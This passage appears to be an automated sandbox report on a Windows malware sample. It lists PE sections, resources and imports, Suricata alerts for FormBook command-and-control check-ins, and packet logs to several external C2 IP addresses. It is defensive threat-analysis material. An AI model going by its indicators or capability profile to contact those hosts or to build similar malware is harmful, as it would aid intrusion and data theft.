jnc 00007F06C0B76A63h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007F06C0B76AB5h
bt esi, 03h
jnc 00007F06C0B76B08h

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2013 UPD4 build 31101
[RES] VS2013 build 21005
[LNK] VS2013 UPD4 build 31101

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xba44c	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc7000	0x57e08	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x92bc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa4870	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8f000	0x884	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8dcc4	0x8de00	3de9cc8884ce5b00bc2079b745b786a7	False	0.5728679102422908	data	6.676133860974604	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8f000	0x2e10e	0x2e200	79b14b254506b0dbc8cd0ad67fb70ad9	False	0.33535526761517614	OpenPGP Public Key	5.76010872795207	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xbe000	0x8f74	0x5200	9f9d6f746f1a415a63de45f8b7983d33	False	0.1017530487804878	data	1.198745897703538	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc7000	0x57e08	0x58000	e2229c33a960e2288899df7856be3b78	False	0.9244190562855114	data	7.889756080276442	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x11f000	0x96000	0x95000	a550f1cde2f6bf15519fab3c1e6f8364	False	0.97575470585151	data	7.9380417991201515	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc75a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc76d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc77f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc7920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xc7c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xc7d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xc8bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xc9480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xc99e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xcbf90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xcd038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xcd4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xcd4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xcda84	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xce110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xce5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xceb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xcf1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xcf660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xcf7b8	0x4f0ce	data			1.0003273726798234
RT_GROUP_ICON	0x11e888	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x11e900	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x11e914	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x11e928	0x14	data	English	Great Britain	1.25
RT_VERSION	0x11e93c	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x11ea18	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll	GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll	AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll	StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll	GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll	LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-11T01:00:38.246645+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.6	49999	85.159.66.93	80	TCP
2025-01-11T01:00:38.246645+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.6	49999	85.159.66.93	80	TCP
2025-01-11T01:00:46.780676+0100	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	54.244.188.177	80	192.168.2.6	49731	TCP
2025-01-11T01:00:46.780676+0100	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	54.244.188.177	80	192.168.2.6	49731	TCP
2025-01-11T01:00:47.813054+0100	2850851	ETPRO MALWARE Win32/Expiro.NDO CnC Activity	1	192.168.2.6	49738	18.141.10.107	80	TCP
2025-01-11T01:01:27.071624+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.6	49967	161.97.142.144	80	TCP
2025-01-11T01:01:27.071624+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.6	49967	161.97.142.144	80	TCP
2025-01-11T01:01:43.249080+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	49986	23.225.159.42	80	TCP
2025-01-11T01:01:46.014387+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	49987	23.225.159.42	80	TCP
2025-01-11T01:01:48.545833+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	49988	23.225.159.42	80	TCP
2025-01-11T01:01:51.123830+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.6	49989	23.225.159.42	80	TCP
2025-01-11T01:01:51.123830+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.6	49989	23.225.159.42	80	TCP
2025-01-11T01:01:58.155103+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	49990	149.88.81.190	80	TCP
2025-01-11T01:02:00.703887+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	49991	149.88.81.190	80	TCP
2025-01-11T01:02:03.249004+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	49992	149.88.81.190	80	TCP
2025-01-11T01:02:25.653554+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.6	49993	149.88.81.190	80	TCP
2025-01-11T01:02:25.653554+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.6	49993	149.88.81.190	80	TCP
2025-01-11T01:02:32.295755+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	49995	85.159.66.93	80	TCP
2025-01-11T01:02:34.860589+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	49996	85.159.66.93	80	TCP
2025-01-11T01:02:37.623969+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	49997	85.159.66.93	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 01:00:45.935292006 CET	49731	80	192.168.2.6	54.244.188.177
Jan 11, 2025 01:00:45.940114021 CET	80	49731	54.244.188.177	192.168.2.6
Jan 11, 2025 01:00:45.940226078 CET	49731	80	192.168.2.6	54.244.188.177
Jan 11, 2025 01:00:45.974980116 CET	49731	80	192.168.2.6	54.244.188.177
Jan 11, 2025 01:00:45.975164890 CET	49731	80	192.168.2.6	54.244.188.177
Jan 11, 2025 01:00:45.979851961 CET	80	49731	54.244.188.177	192.168.2.6
Jan 11, 2025 01:00:45.979898930 CET	80	49731	54.244.188.177	192.168.2.6
Jan 11, 2025 01:00:46.673051119 CET	80	49731	54.244.188.177	192.168.2.6
Jan 11, 2025 01:00:46.673578024 CET	80	49731	54.244.188.177	192.168.2.6
Jan 11, 2025 01:00:46.673706055 CET	49731	80	192.168.2.6	54.244.188.177
Jan 11, 2025 01:00:46.775016069 CET	49731	80	192.168.2.6	54.244.188.177
Jan 11, 2025 01:00:46.780675888 CET	80	49731	54.244.188.177	192.168.2.6
Jan 11, 2025 01:00:47.214601040 CET	49738	80	192.168.2.6	18.141.10.107
Jan 11, 2025 01:00:47.219908953 CET	80	49738	18.141.10.107	192.168.2.6
Jan 11, 2025 01:00:47.220139980 CET	49738	80	192.168.2.6	18.141.10.107
Jan 11, 2025 01:00:47.220217943 CET	49738	80	192.168.2.6	18.141.10.107
Jan 11, 2025 01:00:47.220243931 CET	49738	80	192.168.2.6	18.141.10.107
Jan 11, 2025 01:00:47.225378036 CET	80	49738	18.141.10.107	192.168.2.6
Jan 11, 2025 01:00:47.225389957 CET	80	49738	18.141.10.107	192.168.2.6
Jan 11, 2025 01:00:47.813054085 CET	49738	80	192.168.2.6	18.141.10.107
Jan 11, 2025 01:01:26.434246063 CET	49967	80	192.168.2.6	161.97.142.144
Jan 11, 2025 01:01:26.439141035 CET	80	49967	161.97.142.144	192.168.2.6
Jan 11, 2025 01:01:26.439240932 CET	49967	80	192.168.2.6	161.97.142.144
Jan 11, 2025 01:01:26.450305939 CET	49967	80	192.168.2.6	161.97.142.144
Jan 11, 2025 01:01:26.456468105 CET	80	49967	161.97.142.144	192.168.2.6
Jan 11, 2025 01:01:27.071369886 CET	80	49967	161.97.142.144	192.168.2.6
Jan 11, 2025 01:01:27.071391106 CET	80	49967	161.97.142.144	192.168.2.6
Jan 11, 2025 01:01:27.071408987 CET	80	49967	161.97.142.144	192.168.2.6
Jan 11, 2025 01:01:27.071420908 CET	80	49967	161.97.142.144	192.168.2.6
Jan 11, 2025 01:01:27.071564913 CET	80	49967	161.97.142.144	192.168.2.6
Jan 11, 2025 01:01:27.071624041 CET	49967	80	192.168.2.6	161.97.142.144
Jan 11, 2025 01:01:27.071666956 CET	49967	80	192.168.2.6	161.97.142.144
Jan 11, 2025 01:01:27.078089952 CET	49967	80	192.168.2.6	161.97.142.144
Jan 11, 2025 01:01:27.084273100 CET	80	49967	161.97.142.144	192.168.2.6
Jan 11, 2025 01:01:42.680042028 CET	49986	80	192.168.2.6	23.225.159.42
Jan 11, 2025 01:01:42.687156916 CET	80	49986	23.225.159.42	192.168.2.6
Jan 11, 2025 01:01:42.687263966 CET	49986	80	192.168.2.6	23.225.159.42
Jan 11, 2025 01:01:42.744792938 CET	49986	80	192.168.2.6	23.225.159.42
Jan 11, 2025 01:01:42.753174067 CET	80	49986	23.225.159.42	192.168.2.6
Jan 11, 2025 01:01:43.205363989 CET	80	49986	23.225.159.42	192.168.2.6
Jan 11, 2025 01:01:43.249079943 CET	49986	80	192.168.2.6	23.225.159.42
Jan 11, 2025 01:01:43.274890900 CET	80	49986	23.225.159.42	192.168.2.6
Jan 11, 2025 01:01:43.275005102 CET	49986	80	192.168.2.6	23.225.159.42
Jan 11, 2025 01:01:44.249053955 CET	49986	80	192.168.2.6	23.225.159.42
Jan 11, 2025 01:01:45.428425074 CET	49987	80	192.168.2.6	23.225.159.42
Jan 11, 2025 01:01:45.435137033 CET	80	49987	23.225.159.42	192.168.2.6
Jan 11, 2025 01:01:45.435215950 CET	49987	80	192.168.2.6	23.225.159.42
Jan 11, 2025 01:01:45.452917099 CET	49987	80	192.168.2.6	23.225.159.42
Jan 11, 2025 01:01:45.459507942 CET	80	49987	23.225.159.42	192.168.2.6
Jan 11, 2025 01:01:45.971529961 CET	80	49987	23.225.159.42	192.168.2.6
Jan 11, 2025 01:01:46.014386892 CET	49987	80	192.168.2.6	23.225.159.42
Jan 11, 2025 01:01:46.032768965 CET	80	49987	23.225.159.42	192.168.2.6
Jan 11, 2025 01:01:46.032821894 CET	49987	80	192.168.2.6	23.225.159.42
Jan 11, 2025 01:01:46.967700958 CET	49987	80	192.168.2.6	23.225.159.42
Jan 11, 2025 01:01:47.986356974 CET	49988	80	192.168.2.6	23.225.159.42
Jan 11, 2025 01:01:47.991249084 CET	80	49988	23.225.159.42	192.168.2.6
Jan 11, 2025 01:01:47.991413116 CET	49988	80	192.168.2.6	23.225.159.42
Jan 11, 2025 01:01:48.006728888 CET	49988	80	192.168.2.6	23.225.159.42
Jan 11, 2025 01:01:48.011573076 CET	80	49988	23.225.159.42	192.168.2.6
Jan 11, 2025 01:01:48.011653900 CET	80	49988	23.225.159.42	192.168.2.6
Jan 11, 2025 01:01:48.504317999 CET	80	49988	23.225.159.42	192.168.2.6
Jan 11, 2025 01:01:48.545833111 CET	49988	80	192.168.2.6	23.225.159.42
Jan 11, 2025 01:01:48.574558973 CET	80	49988	23.225.159.42	192.168.2.6
Jan 11, 2025 01:01:48.574640989 CET	49988	80	192.168.2.6	23.225.159.42
Jan 11, 2025 01:01:49.514791965 CET	49988	80	192.168.2.6	23.225.159.42
Jan 11, 2025 01:01:50.533736944 CET	49989	80	192.168.2.6	23.225.159.42
Jan 11, 2025 01:01:50.539570093 CET	80	49989	23.225.159.42	192.168.2.6
Jan 11, 2025 01:01:50.539726019 CET	49989	80	192.168.2.6	23.225.159.42
Jan 11, 2025 01:01:50.552114964 CET	49989	80	192.168.2.6	23.225.159.42
Jan 11, 2025 01:01:50.558840990 CET	80	49989	23.225.159.42	192.168.2.6
Jan 11, 2025 01:01:51.076904058 CET	80	49989	23.225.159.42	192.168.2.6
Jan 11, 2025 01:01:51.123830080 CET	49989	80	192.168.2.6	23.225.159.42
Jan 11, 2025 01:01:51.144654989 CET	80	49989	23.225.159.42	192.168.2.6
Jan 11, 2025 01:01:51.144814968 CET	49989	80	192.168.2.6	23.225.159.42
Jan 11, 2025 01:01:51.145803928 CET	49989	80	192.168.2.6	23.225.159.42
Jan 11, 2025 01:01:51.151226997 CET	80	49989	23.225.159.42	192.168.2.6
Jan 11, 2025 01:01:56.628379107 CET	49990	80	192.168.2.6	149.88.81.190
Jan 11, 2025 01:01:56.633160114 CET	80	49990	149.88.81.190	192.168.2.6
Jan 11, 2025 01:01:56.633240938 CET	49990	80	192.168.2.6	149.88.81.190
Jan 11, 2025 01:01:56.648313046 CET	49990	80	192.168.2.6	149.88.81.190
Jan 11, 2025 01:01:56.653101921 CET	80	49990	149.88.81.190	192.168.2.6
Jan 11, 2025 01:01:58.155102968 CET	49990	80	192.168.2.6	149.88.81.190
Jan 11, 2025 01:01:58.208221912 CET	80	49990	149.88.81.190	192.168.2.6
Jan 11, 2025 01:01:59.174149990 CET	49991	80	192.168.2.6	149.88.81.190
Jan 11, 2025 01:01:59.179474115 CET	80	49991	149.88.81.190	192.168.2.6
Jan 11, 2025 01:01:59.179558992 CET	49991	80	192.168.2.6	149.88.81.190
Jan 11, 2025 01:01:59.194875002 CET	49991	80	192.168.2.6	149.88.81.190
Jan 11, 2025 01:01:59.200017929 CET	80	49991	149.88.81.190	192.168.2.6
Jan 11, 2025 01:02:00.703886986 CET	49991	80	192.168.2.6	149.88.81.190
Jan 11, 2025 01:02:00.752203941 CET	80	49991	149.88.81.190	192.168.2.6
Jan 11, 2025 01:02:01.721157074 CET	49992	80	192.168.2.6	149.88.81.190
Jan 11, 2025 01:02:01.726013899 CET	80	49992	149.88.81.190	192.168.2.6
Jan 11, 2025 01:02:01.726142883 CET	49992	80	192.168.2.6	149.88.81.190
Jan 11, 2025 01:02:01.741420031 CET	49992	80	192.168.2.6	149.88.81.190
Jan 11, 2025 01:02:01.746201038 CET	80	49992	149.88.81.190	192.168.2.6
Jan 11, 2025 01:02:01.746294975 CET	80	49992	149.88.81.190	192.168.2.6
Jan 11, 2025 01:02:03.249003887 CET	49992	80	192.168.2.6	149.88.81.190
Jan 11, 2025 01:02:03.296183109 CET	80	49992	149.88.81.190	192.168.2.6
Jan 11, 2025 01:02:04.268137932 CET	49993	80	192.168.2.6	149.88.81.190
Jan 11, 2025 01:02:04.274821043 CET	80	49993	149.88.81.190	192.168.2.6
Jan 11, 2025 01:02:04.275012016 CET	49993	80	192.168.2.6	149.88.81.190
Jan 11, 2025 01:02:04.284415960 CET	49993	80	192.168.2.6	149.88.81.190
Jan 11, 2025 01:02:04.290715933 CET	80	49993	149.88.81.190	192.168.2.6
Jan 11, 2025 01:02:18.012955904 CET	80	49990	149.88.81.190	192.168.2.6
Jan 11, 2025 01:02:18.013176918 CET	49990	80	192.168.2.6	149.88.81.190
Jan 11, 2025 01:02:20.555819035 CET	80	49991	149.88.81.190	192.168.2.6
Jan 11, 2025 01:02:20.555892944 CET	49991	80	192.168.2.6	149.88.81.190
Jan 11, 2025 01:02:23.091209888 CET	80	49992	149.88.81.190	192.168.2.6
Jan 11, 2025 01:02:23.091290951 CET	49992	80	192.168.2.6	149.88.81.190
Jan 11, 2025 01:02:25.653426886 CET	80	49993	149.88.81.190	192.168.2.6
Jan 11, 2025 01:02:25.653553963 CET	49993	80	192.168.2.6	149.88.81.190
Jan 11, 2025 01:02:25.654697895 CET	49993	80	192.168.2.6	149.88.81.190
Jan 11, 2025 01:02:25.659491062 CET	80	49993	149.88.81.190	192.168.2.6
Jan 11, 2025 01:02:30.767359018 CET	49995	80	192.168.2.6	85.159.66.93
Jan 11, 2025 01:02:30.772150040 CET	80	49995	85.159.66.93	192.168.2.6
Jan 11, 2025 01:02:30.772332907 CET	49995	80	192.168.2.6	85.159.66.93
Jan 11, 2025 01:02:30.788394928 CET	49995	80	192.168.2.6	85.159.66.93
Jan 11, 2025 01:02:30.793320894 CET	80	49995	85.159.66.93	192.168.2.6
Jan 11, 2025 01:02:32.295754910 CET	49995	80	192.168.2.6	85.159.66.93
Jan 11, 2025 01:02:32.302314997 CET	80	49995	85.159.66.93	192.168.2.6
